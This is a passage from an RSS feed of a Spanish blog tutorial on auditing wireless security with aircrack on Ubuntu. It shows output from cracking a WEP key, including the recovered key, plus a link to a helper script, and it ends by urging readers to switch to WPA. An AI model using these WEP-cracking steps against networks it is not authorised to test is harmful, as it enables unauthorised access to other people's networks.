<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">KB&nbsp; &nbsp; depth&nbsp; &nbsp;byte<span style="color:#006600; font-weight:bold;">&#40;</span>vote<span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">0</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>/&nbsp; <span style="color:#800000;color:#800000;">1</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">39</span><span style="color:#006600; font-weight:bold;">&#40;</span> <span style="color:#800000;color:#800000;">100</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">11</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">33</span><span style="color:#006600; font-weight:bold;">&#41;</span> D6<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">15</span><span style="color:#006600; font-weight:bold;">&#41;</span> 6C<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">13</span><span style="color:#006600; font-weight:bold;">&#41;</span> 6D<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> 0D<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">11</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">17</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">9</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">95</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">8</span><span style="color:#006600; font-weight:bold;">&#41;</span> 5D<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">76</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">93</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> D0<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">00</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">4</span><span style="color:#006600; font-weight:bold;">&#41;</span> 0C<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">4</span><span style="color:#006600; font-weight:bold;">&#41;</span> 3A<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">3</span><span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">1</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>/&nbsp; <span style="color:#800000;color:#800000;">1</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">93</span><span style="color:#006600; font-weight:bold;">&#40;</span> <span style="color:#800000;color:#800000;">100</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">03</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">37</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">06</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">31</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">83</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">19</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">19</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">13</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">39</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> B3<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> D4<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">02</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">11</span><span style="color:#006600; font-weight:bold;">&#41;</span> CC<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">8</span><span style="color:#006600; font-weight:bold;">&#41;</span> FD<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">7</span><span style="color:#006600; font-weight:bold;">&#41;</span> 6C<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">86</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> D2<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">30</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">4</span><span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">2</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>/&nbsp; <span style="color:#800000;color:#800000;">1</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">19</span><span style="color:#006600; font-weight:bold;">&#40;</span> <span style="color:#800000;color:#800000;">121</span><span style="color:#006600; font-weight:bold;">&#41;</span> 1B<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">15</span><span style="color:#006600; font-weight:bold;">&#41;</span> CE<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> EB<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">12</span><span style="color:#006600; font-weight:bold;">&#41;</span> 2C<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">9</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">41</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">8</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">82</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">8</span><span style="color:#006600; font-weight:bold;">&#41;</span> CD<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">6</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">00</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">15</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> 1A<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> 2B<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">34</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">39</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> A2<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;"><span style="color:#800000;color:#800000;">3</span>&nbsp; &nbsp; <span style="color:#800000;color:#800000;">0</span>/&nbsp; <span style="color:#800000;color:#800000;">1</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">94</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">88</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">18</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">20</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">78</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">18</span><span style="color:#006600; font-weight:bold;">&#41;</span> D8<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">17</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">19</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">16</span><span style="color:#006600; font-weight:bold;">&#41;</span> D0<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">16</span><span style="color:#006600; font-weight:bold;">&#41;</span> 0D<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; <span style="color:#800000;color:#800000;">10</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">83</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">9</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">69</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">8</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">75</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">6</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">82</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">6</span><span style="color:#006600; font-weight:bold;">&#41;</span> A0<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">6</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">41</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> <span style="color:#800000;color:#800000;">46</span><span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span> A2<span style="color:#006600; font-weight:bold;">&#40;</span>&nbsp; &nbsp;<span style="color:#800000;color:#800000;">5</span><span style="color:#006600; font-weight:bold;">&#41;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">&nbsp;</div>
</li>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">KEY FOUND! <span style="color:#006600; font-weight:bold;">&#91;</span> <span style="color:#800000;color:#800000;">39</span>:<span style="color:#800000;color:#800000;">93</span>:<span style="color:#800000;color:#800000;">19</span>:<span style="color:#800000;color:#800000;">94</span>:<span style="color:#800000;color:#800000;">35</span> <span style="color:#006600; font-weight:bold;">&#93;</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">Decrypted correctly: <span style="color:#800000;color:#800000;">100</span>% </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Todo esto se puede hacer de forma mas simple, con el <a href="http://vive-libre.com/blog/etc/airoway.sh">airoway.sh</a> solo hay que editar la interfas de injecion segun sea nuestro caso, que puede ser wifi0 o eth1</p>
<div class="igBar"><span id="lcode-44"><a href="#" onclick="javascript:showPlainTxt('code-44'); return false;">PLAIN TEXT</a></span></div>
<div class="syntax_hilite"><span class="langName">CODE:</span>
<div id="code-44">
<div class="code">
<ol>
<li style="font-family: 'Courier New', Courier, monospace; color: black; font-weight: normal; font-style: normal;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">LISTEN=<span style="color:#CC0000;">"rtap0"</span></div>
</li>
<li style="font-weight: bold;color:#498BFE;">
<div style="font-family: 'Courier New', Courier, monospace; font-weight: normal;">INJECT=<span style="color:#CC0000;">"eth1"</span> </div>
</li>
</ol>
</div>
</div>
</div>
<p></p>
<p>Como podemos ver, el cifrado WEP no es suficiente para la proteccion de nuestra redes wireless, no exponga la integridad de su red, y utilecen WPA.</p>
<p>Espero le haya sido de utilidad.</p>
<p>Referencias:</p>
<p>http://aircrack-ng.org/doku.php?id=ipw3945</p>
<p>http://seguridadwireless.net</p>
]]></content:encoded>
			<wfw:commentRss>http://vive-libre.com/blog/2008/03/06/adutoria-de-seguridad-wireless-con-ipw3945-ubuntu-y-aircrack/feed/</wfw:commentRss>
		<slash:comments>91</slash:comments>
		</item>
	</channel>
</rss>
